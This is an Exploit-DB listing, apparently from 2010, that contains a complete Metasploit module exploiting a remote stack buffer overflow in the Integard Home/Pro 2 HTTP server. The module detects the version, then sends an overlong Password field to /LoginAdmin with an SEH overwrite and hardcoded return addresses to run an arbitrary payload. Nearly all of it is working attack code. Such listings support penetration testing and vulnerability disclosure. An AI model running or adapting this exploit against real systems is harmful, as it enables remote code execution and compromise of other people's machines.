Integard Home and Pro 2 - Remote HTTP Buffer Overflow

EDB-ID:

14941

CVE:





Platform:

Windows_x86

Date:

2010-09-07


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Integard Home/Pro version 2.0',
			'Description'    => %q{
					Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
			},
			'Author'  =>
				[
					'Lincoln',
					'Nullthreat',
					'rick2600',
					'corelanc0d3r' 
				],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: $',
			'References'    =>
				[
					['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
					'StackAdjustment' => -1500,
				},
			'Platform'       => 'win',
			'Privileged'     => false,
			'Targets'        =>
				[
					[ 'Automatic Targeting',          { 'auto' => true }],
					[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
					[ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(18881)
			], self.class )
	end


	def exploit
		mytarget = target
		continueattack=true
		if(target['auto'])
			mytarget = nil
			print_status("[*] Automatically detecting the target...")
			connect
			response = send_request_raw(
			{'uri' => '/banner.jpg', 
			'version' => '1.1', 
			'method' => 'GET'
			}, 5)
			contlength = response['Content-Length']
			if (contlength == "24584")
				print_status("[!] Found Version - Integard Home")
				mytarget = self.targets[1]
			elsif (contlength == "23196")
				print_status("[!] Found Version - Integard Pro")
				mytarget = self.targets[2]
			else
				print_status("[-] Unknown Version")
				continueattack=false
			end
			disconnect
		end
		if continueattack
			print_status("[!] Selected Target: #{mytarget.name}")
			print_status("[*] Building Buffer")
			pay = payload.encoded
			junk = rand_text_alpha_upper(3091 - pay.length)
			jmp = "\xE9\x2B\xF8\xFF\xFF"
			nseh = "\xEB\xF9\x90\x90"
			seh = [mytarget.ret].pack('V')
			buffer = junk + pay + jmp + nseh + seh
			print_status("[*] Sending Request")
			post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
			req = "/LoginAdmin"
			connect
			send_request_raw({
				'uri' => req,
				'version' => '1.1',
				'method' => 'POST',
				'headers' => 
					{
					'Host' => '192.168.1.1:18881',
					'Content-Length' => 1074
					},
				'data' => post_data
				}, 5)
			print_status("[*] Request Sent")
			handler
		end
	end
end